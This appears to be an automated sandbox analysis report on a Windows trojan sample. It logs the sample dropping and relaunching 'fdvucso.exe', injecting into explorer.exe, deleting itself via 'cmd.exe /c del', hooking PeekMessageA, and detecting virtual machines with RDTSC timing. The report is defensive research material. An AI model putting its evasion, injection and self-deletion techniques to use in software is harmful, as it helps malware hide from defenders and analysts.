          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeJump to behavior
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeFile created: C:\Users\user\AppData\Local\Temp\nscCE76.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@4/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SecuriteInfo.com.Variant.Jaik.72878.10638.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: SecuriteInfo.com.Variant.Jaik.72878.10638.exe, 00000000.00000002.454080692.0000000000789000.00000004.00000001.01000000.00000003.sdmp, fdvucso.exe, 00000001.00000000.430396179.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000001.00000002.440272687.000000000119E000.00000002.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000002.00000000.433738219.000000000119E000.00000002.00000001.01000000.00000004.sdmp, cmd.exe, 0000000D.00000002.695116331.000000000335F000.00000004.10000000.00040000.00000000.sdmp, nsmCEB5.tmp.0.dr, fdvucso.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fdvucso.exe, 00000001.00000003.438551302.000000001A540000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000001.00000003.434608426.000000001A6D0000.00000004.00001000.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515050798.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.441575692.0000000001354000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000003.439819748.00000000011B4000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000002.00000002.515766558.000000000160F000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000D.00000002.694158511.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.515945671.0000000000BC9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000003.514406903.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694414486.0000000000E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: fdvucso.exe, 00000002.00000002.516194872.0000000003200000.00000040.10000000.00040000.00000000.sdmp, fdvucso.exe, 00000002.00000003.513191387.0000000001041000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.694963571.0000000001100000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000D.00000000.513997856.0000000001100000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01192445 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00417811 push cs; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041E9F4 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00416495 push edx; retf
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041D4B5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041D56C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041D502 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_0041D50B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_01192445 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DDD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeFile created: C:\Users\user\AppData\Local\Temp\fdvucso.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01191890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000169904 second address: 000000000016990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000169B7E second address: 0000000000169B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 7092Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 6824Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeAPI coverage: 4.4 %
          Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 4.1 %
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.492546871.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.493068210.0000000007F92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.472921591.0000000006900000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.478996643.00000000081C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}$$&2=
          Source: explorer.exe, 00000005.00000000.477575107.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.493068210.0000000007F92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.494782734.00000000081C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01191D2C _memset,IsDebuggerPresent,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_0119558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 1_2_01191D17 GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 2_2_00409AB0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00DB2ACB mov eax, dword ptr fs:[00000030h]
